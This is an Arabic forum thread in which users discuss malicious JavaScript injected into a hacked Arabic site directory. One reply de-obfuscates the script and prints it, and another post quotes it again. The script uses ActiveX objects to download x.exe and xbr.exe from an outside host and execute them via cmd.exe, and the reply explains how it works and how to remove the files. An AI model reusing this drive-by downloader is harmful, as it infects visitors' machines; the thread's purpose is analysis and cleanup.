وش معنى هالكود الموجود بسورس دليل عز بعد الاختراق ؟؟

**محمد الطويل** · 18-08-2007

هذا فقط ماوجدته بالسورس كاملاً

تم حذف الكود من قبلي منعاً لانتشاره بين ضعاف النفوس

شئ عجيب !!
مع خبرتي بالجافا والـ PHP إلا أني اول مره اشوف هالكود !!
ممكن احد يفيدنا لاهنتم ؟ خاصة zizwar !!

**محمد الثقفي** · 18-08-2007

كود خطير يقوم بتنفيذ جافا سكريبت لتنزيل ملفين على جهاز الزائر

بعد مافكيته هذا اصله

كود:

<script language=javascript>

function gn(n) 

{ 

var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe'; 

} 

try 

{ aaa="ob";

bbb="je";

yyy="ct";

ccc="Adodb.";

ddd="Stream";

eee="Microsoft.";

fff="XMLHTTP";

ggg="o";

kkk="p";

mmm="e";

sss="n";

lj='http://www.hack-sa.com/x.exe'; 

var df=document.createElement(aaa+bbb+yyy); 


var x=df.CreateObject(eee+fff,""); 

var S=df.CreateObject(ccc+ddd,""); 

S.type=1; 

x.open("GET", lj,0);

x.send(); 

mz1=gn(10000); 



S.Open();

ttt=x.responseBody;

S.Write(ttt); 

S.SaveToFile(mz1,2); S.Close(); 

Q.ShellExecute(exp1,' /c '+mz1,"",ggg+kkk+mmm+sss,0); 

} catch(i) { i=1; } 

</script>



<script language=javascript>

function gn(n) 

{ 

var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe'; 

} 

try 

{ aaa="ob";

bbb="je";

yyy="ct";

ccc="Adodb.";

ddd="Stream";

eee="Microsoft.";

fff="XMLHTTP";

ggg="o";

kkk="p";

mmm="e";

sss="n";

lj='http://www.hack-sa.com/xbr.exe'; 



S.type=1; 

x.open("GET", lj,0);

x.send(); 

mz1=gn(10000); 

ttt=x.responseBody;

S.Write(ttt); 

S.SaveToFile(mz1,2); S.Close(); 

var Q=df.CreateObject("Shell.Application",""); 

exp1=F.BuildPath(tmp+'\\system32','cmd.exe'); 

Q.ShellExecute(exp1,' /c '+mz1,"",ggg+kkk+mmm+sss,0); 

} catch(i) { i=1; } 

</script>



<script type="text/jscript">function init() { document.write("<title>قريــبا !</title><p align=center>&nbsp;</p><p align=center><font size=7>الموقع تحت الانشأء </font><b><font size=7>.. !</font></b></p>");}window.onload = init;</script>

<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">

يقوم بانزال ملفين

xbr.exe

و

x.exe

لذلك ابحث عن هذه الملفين في جهازك

ادخل على الويندوز من خلال safe mode

واحذفها

ملاحظه :

لقد قمت بحذف بعض الاسطر تحسبا من ضعاف النفوس

فكرة الفايروس كالتالي :

يقوم بتنزيل الملفات على الكاش في جهاز الزائر

يستخدم cmd او الدوس لنسخ الملفين الى مجلد system32

يستخدم ال register لوضع بيانات تنفيذ الملفات

يرجع يستخدم الدوس لتنفيذ الملفين

* شرحتها للافاده وايضا حذفت الاسطر المهمه لتشغيلها اي وجود الكود هنا بدون فائده

وارجو منك تعديل موضوعك وحذف بعض من الارقام حتى لايظهر الكود كامل عند فك التشفير

شكرا لك

**Khlodi** · 18-08-2007

المشاركة الأصلية كتبت بواسطة MohDesign

كود خطير يقوم بتنفيذ جافا سكريبت لتنزيل ملفين على جهاز الزائر

بعد مافكيته هذا اصله

كود:

<script language=javascript>

function gn(n) 

{ 

var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe'; 

} 

try 

{ aaa="ob";

bbb="je";

yyy="ct";

ccc="Adodb.";

ddd="Stream";

eee="Microsoft.";

fff="XMLHTTP";

ggg="o";

kkk="p";

mmm="e";

sss="n";

lj='http://www.hack-sa.com/x.exe'; 

var df=document.createElement(aaa+bbb+yyy); 


var x=df.CreateObject(eee+fff,""); 

var S=df.CreateObject(ccc+ddd,""); 

S.type=1; 

x.open("GET", lj,0);

x.send(); 

mz1=gn(10000); 



S.Open();

ttt=x.responseBody;

S.Write(ttt); 

S.SaveToFile(mz1,2); S.Close(); 

Q.ShellExecute(exp1,' /c '+mz1,"",ggg+kkk+mmm+sss,0); 

} catch(i) { i=1; } 

</script>



<script language=javascript>

function gn(n) 

{ 

var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe'; 

} 

try 

{ aaa="ob";

bbb="je";

yyy="ct";

ccc="Adodb.";

ddd="Stream";

eee="Microsoft.";

fff="XMLHTTP";

ggg="o";

kkk="p";

mmm="e";

sss="n";

lj='http://www.hack-sa.com/xbr.exe'; 



S.type=1; 

x.open("GET", lj,0);

x.send(); 

mz1=gn(10000); 

ttt=x.responseBody;

S.Write(ttt); 

S.SaveToFile(mz1,2); S.Close(); 

var Q=df.CreateObject("Shell.Application",""); 

exp1=F.BuildPath(tmp+'\\system32','cmd.exe'); 

Q.ShellExecute(exp1,' /c '+mz1,"",ggg+kkk+mmm+sss,0); 

} catch(i) { i=1; } 

</script>



<script type="text/jscript">function init() { document.write("<title>قريــبا !</title><p align=center>&nbsp;</p><p align=center><font size=7>الموقع تحت الانشأء </font><b><font size=7>.. !</font></b></p>");}window.onload = init;</script>

<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">

يقوم بانزال ملفين

xbr.exe

و

x.exe

لذلك ابحث عن هذه الملفين في جهازك

ادخل على الويندوز من خلال safe mode

واحذفها

ملاحظه :

لقد قمت بحذف بعض الاسطر تحسبا من ضعاف النفوس

فكرة الفايروس كالتالي :

يقوم بتنزيل الملفات على الكاش في جهاز الزائر

يستخدم cmd او الدوس لنسخ الملفين الى مجلد system32

يستخدم ال register لوضع بيانات تنفيذ الملفات

يرجع يستخدم الدوس لتنفيذ الملفين

* شرحتها للافاده وايضا حذفت الاسطر المهمه لتشغيلها اي وجود الكود هنا بدون فائده

وارجو منك تعديل موضوعك وحذف بعض من الارقام حتى لايظهر الكود كامل عند فك التشفير

شكرا لك

طيب هل يعمل الكود مع الفايرفوكس

**محمد الطويل** · 18-08-2007

بيض الله وجهك على المعلومة يا أستاذي MohDesign

وتم حذف الكود اعلاه منعاً للانتشار بين ضعاف النفوس

المشاركة الأصلية كتبت بواسطة Khlodi

طيب هل يعمل الكود مع الفايرفوكس

سبحان الله

كنت بسأل هالسؤال بس سبقتني

فعلاً بحثت بالكاش عن الملفين وبحثت عنهم أيضاً عن طريق البحث بالويندوز كاملاً

ولم أجد شيئاً

أيضاً اود ان اخبرك انني عندما قمت بفتح الصفحة اعطاني صفحة بيضاء فقط لاغير

مع انه بالكود يعطيك document.write لكني لم ار اي كتابة على المتصفح نهائياً

هل هذا معناه انه لايعمل مع الفايرفوكس ؟؟

الموضوع: وش معنى هالكود الموجود بسورس دليل عز بعد الاختراق ؟؟

أدوات الموضوع

بحث في الموضوع

وش معنى هالكود الموجود بسورس دليل عز بعد الاختراق ؟؟

المواضيع المتشابهه

نظرًا لأسباب قانونية، قمنا بمنع المحتوى الموجود في دليل/عنوان URL التالي أو ضمنه من ن

مطلوب المرجع الإسلامي الشامل .. مثل الموجود في دليل عز

من يوفر لنا سكربت دليل المواقع الموجود في موقع قلعة العرب

يا اخوان ابي حل في هالكود

مين يعرف وش هالكود ؟

ضوابط المشاركة